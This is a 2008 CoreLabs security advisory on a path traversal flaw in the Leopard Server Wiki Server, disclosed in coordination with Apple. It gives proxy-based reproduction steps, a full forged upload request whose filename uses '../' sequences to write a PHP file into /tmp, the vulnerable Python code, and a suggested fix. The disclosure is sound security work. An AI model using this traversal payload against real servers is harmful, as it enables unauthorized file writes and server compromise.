Leopard Server Remote Path Traversal
Core Security Technologies - CoreLabs Advisory
Title: Leopard Server Remote Path Traversal
Advisory ID: CORE-2008-0123
Advisory URL: http://www.coresecurity.com/?action=item&id=2189
Date published: 2008-03-18
Date of last update: 2008-03-18
Vendors contacted: Apple Inc.
Release mode: Coordinated release
MacOS X Server 10.5 , also known as Leopard Server features a Wiki Server , which is a multiuser web application written in Python. The Wiki Server is vulnerable to a path traversal attack, which can be exploited by non-privileged system users via a forged file upload to write arbitrary files on locations in the server filesystem, restricted only by privileges of the Wiki Server application.
View section "Vendor Information, Solutions and Workarounds".
Apple security updates are available via the Software Update mechanism:
Apple security updates are also available for manual download via:
Cross-reference to Apple security updates:
This vulnerability was discovered and researched by Rodrigo Carvalho, from the Core Security Consulting Services (CSC) team of Core Security Technologies, during Bugweek 2007. Special thanks to Norberto Kueffner for infrastructure support.
A path or directory traversal attack technique forces access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate the http requests in such a way that the web site will write, execute or reveal the contents of arbitrary files outside the intended path of the web documents. Any device that exposes an HTTP-based interface is potentially vulnerable to path traversal.
In the MacOS X Server the python web server called "Wiki Server" is enabled by default and every system user has a weblog available to post articles and files. Attached files are written for example in path
/Library/Collaboration/Users/guest/weblog/3f081.page/attachments/731b1/ for user
3f081 are hash/random hexa characters assigned to the blog post title and
731b1 are hash/random hexa characters assigned to the file uploaded.
Next, we show a Proof of Concept (PoC) attack to the Leopard's Wiki Server. It creates a file
[xxxxx] are random hexa characters assigned to the file, as we have said. You can write on all the folders where user
_teamsserver, the user running the Wiki Server, has permissions.
For example, to reproduce the attack using Paros proxy , follow these steps:
- Check the web server is up.
- Check you have a system user/password in the system, for example guest, and the log in.
- Start editing a new post in your blog.
- Start Paros proxy, go to Trap tab and enable Trap requests checkbox.
- Start uploading your preferred file, for example popote.php.
- In Paros, press Continue until you find the POST request.
../../../../../../.. at the beginning of
popote.php plus your wished path, for example
- Press Continue a couple of times to send the request.
- If user
_teamsserver has permissions on the wished folder, you will write file
popote.php inside subfolder
[xxxxx], where [xxxxx] are hash/random hexa characters that depend on the file.
There are several strategies that can be used in combination with a path traversal to gain complete control of the victim's server, although we will not discuss them here.
An example forged request follows:
POST <http://192.168.xxx.xxx/users/guest/weblog/3f081/attachments> HTTP/1.0 User-Agent: Opera/9.24 (Macintosh; Intel Mac OS X; U; en) Paros/3.2.13 Host: 192.168.xxx.xxx Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: en,ja;q=0.9,fr;q=0.8,de;q=0.7,es;q=0.6,it;q=0.5,nl;q=0.4,sv;q=0.3,nb;q=0.2,da;q=0.1,fi;q=0.1,pt;q=0.1,zh-CN;q=0.1,zh-TW;q=0.1,ko;q=0.1,ru;q=0.1,en;q=0.1 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: identity, *;q=0 Referer: <http://192.168.xxx.xxx/users/guest/weblog/3f081/> Cookie: cookies=1; acl_cache=3; recentTags=add tags here; SQMSESSID=fe79c978b66bf3bf6d0c433abd6008a6; sessionID=75706E3C-FA5A-4535-85EA-0D69812D21D3; utcOffset=-3; uploadID=57904 Cookie2: $Version=1 Proxy-Connection: close Content-length: 426 Content-Type: multipart/form-data; boundary=----------YN7xkbcuNgNx21psG30p21 ------------YN7xkbcuNgNx21psG30p21 Content-Disposition: form-data; name="Attachment"; filename="../../../../../../../tmp/popote.php" Content-Type: application/octet-stream <? phpinfo(); ?> ------------YN7xkbcuNgNx21psG30p21 Content-Disposition: form-data; name="ok_button" Attach ------------YN7xkbcuNgNx21psG30p21 Content-Disposition: form-data; name="upload_id" 57904 ------------YN7xkbcuNgNx21psG30p21--
The vulnerable code is located at
def uploadFileCallback(self, result): filename, filetype, aFile = result[self.type] filename = filename.decode('utf-8') filename = filename.split('\\')[-1] # IE sends the whole path, including your local username. extension = filename.split('.')[-1] oldFilename = filename uploadType = os.path.split(self.fullpath)[-1] if uploadType == "images": filename = SettingsManager.findGoodName() + '.' + extension logging.debug("beginning file upload: %s" % filename) isImage = filenameIsImage(filename) newPath = ImageUtilities.findUniqueFileName(os.path.join(self.fullpath, filename), isImage = (not uploadType == 'attachments')) newFilename = os.path.basename(newPath) if uploadType == "attachments": newParentFolder = os.path.dirname(newPath) os.mkdir(newParentFolder) newFilename = os.path.join(os.path.basename(newParentFolder), filename) [...]
The hash/random hexa characters used for the attachment subfolder are generated by code at
def findUniqueFileName(inPath, isImage = True): """Uniqueifies a file name, to avoid duplicates in images and attachments""" filename = os.path.basename(inPath) base, extension = os.path.splitext(filename) parent = os.path.dirname(inPath) aPath = '' mungedName = SettingsManager.findGoodName() if not isImage: #attachment, so make the minged name a subdirectory and put the file in that aPath = os.path.join(parent, mungedName, filename) while os.path.exists(aPath): mungedName = SettingsManager.findGoodName(mungedName) aPath = os.path.join(parent, mungedName, filename) else: aPath = os.path.join(parent, mungedName + extension) while os.path.exists(aPath): mungedName = SettingsManager.findGoodName(mungedName) aPath = os.path.join(parent, mungedName + extension) return aPath
One possibility for fixing this issue is to use the function
/usr/share/wikid/lib/python/apple_utilities/PathHelper.py to check if the filename is sane:
def safePath(inPath): """Returns whether the path is safe or not as defined by the absence of arbitrary path traversal elements""" pieces = inPath.split('/') if '..' in pieces: return False return True
 Paros proxy <http://www.parosproxy.org>
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/.
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.